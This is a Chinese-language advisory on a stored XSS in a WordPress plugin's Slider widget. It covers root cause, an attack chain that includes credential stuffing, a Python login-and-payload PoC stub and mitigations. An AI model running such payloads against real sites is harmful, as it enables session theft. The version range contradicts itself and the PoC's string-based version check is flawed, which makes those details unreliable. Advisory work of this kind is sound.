CVE-2025-12830 Better Elementor Addons插件Slider组件存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-12830

漏洞类型

存储型XSS

CVSS评分

6.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Better Elementor Addons插件（WordPress）

漏洞概述

Better Elementor Addons是WordPress平台上一个流行的Elementor页面构建器增强插件，提供了多种自定义小部件来扩展Elementor的功能。该插件的Slider（滑块）小部件在处理用户输入属性时存在存储型跨站脚本（Stored XSS）漏洞，漏洞存在于所有版本直至1.5.5。由于该插件在处理用户提供的属性时未能进行充分的输入清理和输出转义，认证的攻击者（拥有contributor权限或更高级别）可以在Slider组件的属性字段中注入恶意JavaScript代码。这些恶意脚本会被永久存储在数据库中，当其他用户访问包含该Slider组件的页面时，恶意代码将自动执行，可能导致会话劫持、敏感信息窃取、恶意重定向等安全问题。由于攻击利用需要一定的WordPress用户权限（contributor+），且CVSS评分为6.4，属于中危级别漏洞，建议相关用户尽快升级到最新版本以修复此安全问题。

技术细节

该漏洞的根本原因在于Better Elementor Addons插件的Slider组件在处理用户输入时缺乏适当的安全防护。具体来说，问题出现在slider/styles目录下的多个样式文件中（如style1.php、style2.php、style5.php等），这些文件在渲染Slider组件时直接使用了用户提供的属性值而未进行充分的HTML转义。攻击者可以通过WordPress后台的Elementor编辑器，在Slider小部件的属性配置中注入包含JavaScript代码的恶意payload，例如在链接URL、标题文本或Alt属性等字段中嵌入<script>alert('XSS')</script>等代码。由于这些输入被直接存储到WordPress数据库中且在页面加载时未经过转义输出，任何访问该页面的用户都会触发恶意脚本执行。攻击者利用此漏洞可以窃取受害者的Cookie信息、劫持用户会话、进行钓鱼攻击或植入恶意重定向。CVSS 3.1向量AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N表明该漏洞可通过网络利用，攻击复杂度低，需要低权限认证，但影响范围覆盖整个系统。

攻击链分析

STEP 1

Reconnaissance

攻击者识别目标WordPress网站并确认安装了Better Elementor Addons插件，版本在1.5.5或更低版本

STEP 2

Authentication

攻击者获取WordPress账户权限（至少Contributor级别），可通过社会工程、凭证填充或内部人员获取

STEP 3

Payload Injection

攻击者登录WordPress后台，使用Elementor编辑器在页面中添加Slider小部件，在属性字段（如链接URL、标题、Alt文本等）中注入恶意JavaScript代码

STEP 4

Persistence

包含恶意脚本的页面内容被保存到WordPress数据库中，实现持久化存储

STEP 5

Execution

当其他用户（管理员、编辑、访客等）访问包含该Slider组件的页面时，恶意JavaScript代码在用户浏览器中自动执行

STEP 6

Impact

攻击者可窃取用户会话Cookie、劫持账户、执行恶意操作、植入钓鱼链接或传播恶意软件

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys
from bs4 import BeautifulSoup

# CVE-2025-12830 PoC - Better Elementor Addons Stored XSS
# Target: WordPress site with Better Elementor Addons plugin <= 1.5.5

def exploit_stored_xss(target_url, username, password):
    """
    Exploit the Stored XSS vulnerability in Better Elementor Addons Slider widget
    This PoC demonstrates how an authenticated contributor+ user can inject XSS payload
    """
    
    # XSS payload - can be placed in various Slider attributes
    xss_payload = '<script>console.log("XSS Triggered - CVE-2025-12830")</script>'
    
    # Step 1: Login to WordPress
    session = requests.Session()
    login_url = f"{target_url}/wp-login.php"
    
    login_data = {
        'log': username,
        'pwd': password,
        'wp-submit': 'Log In',
        'redirect_to': '/wp-admin/'
    }
    
    response = session.post(login_url, data=login_data, allow_redirects=True)
    
    if 'wordpress_logged_in' not in session.cookies.get_dict():
        print("[-] Login failed")
        return False
    
    print("[+] Login successful")
    
    # Step 2: Create or edit a page with Elementor
    # This would require Elementor Editor API interaction
    # The actual exploitation happens when adding a Slider widget with XSS in attributes
    
    # Example XSS injection points in Slider widget:
    # - Slider link URL field
    # - Slide title/description fields
    # - Image alt text
    # - Custom CSS classes
    
    print("[*] XSS Payload to inject:", xss_payload)
    print("[*] Injection point: Slider widget attributes in Elementor editor")
    print("[*] Required permission: Contributor or higher")
    
    # Step 3: Verify the stored XSS
    # After saving, any user viewing the page will trigger the XSS
    
    return True


def verify_vulnerability(target_url):
    """
    Verify if the target is vulnerable by checking plugin version
    """
    
    # Check plugin version via WordPress API
    plugin_info_url = f"{target_url}/wp-json/wp/v2/plugins/better-elementor-addons"
    
    try:
        response = requests.get(plugin_info_url)
        if response.status_code == 200:
            data = response.json()
            version = data.get('version', 'unknown')
            print(f"[*] Detected Better Elementor Addons version: {version}")
            
            if version and version <= '1.5.5':
                print("[!] Target appears to be vulnerable")
                return True
    except:
        pass
    
    print("[*] Could not determine plugin version")
    return False


if __name__ == "__main__":
    if len(sys.argv) < 4:
        print("Usage: python cve-2025-12830-poc.py <target_url> <username> <password>")
        sys.exit(1)
    
    target = sys.argv[1]
    user = sys.argv[2]
    pwd = sys.argv[3]
    
    print(f"[*] Testing CVE-2025-12830 on {target}")
    
    if verify_vulnerability(target):
        exploit_stored_xss(target, user, pwd)

影响范围

Better Elementor Addons < 1.5.5

防御指南

临时缓解措施

如果无法立即升级插件，可采取以下临时缓解措施：1）禁用或删除Better Elementor Addons插件；2）限制用户角色权限，禁止Contributor及以下角色使用Elementor编辑器；3）使用Web应用防火墙（WAF）规则过滤恶意脚本；4）启用HTTP安全头部（如Content-Security-Policy、X-XSS-Protection）；5）监控WordPress后台的异常活动日志。长期来看，建议用户尽快升级到插件最新版本以彻底消除该安全风险。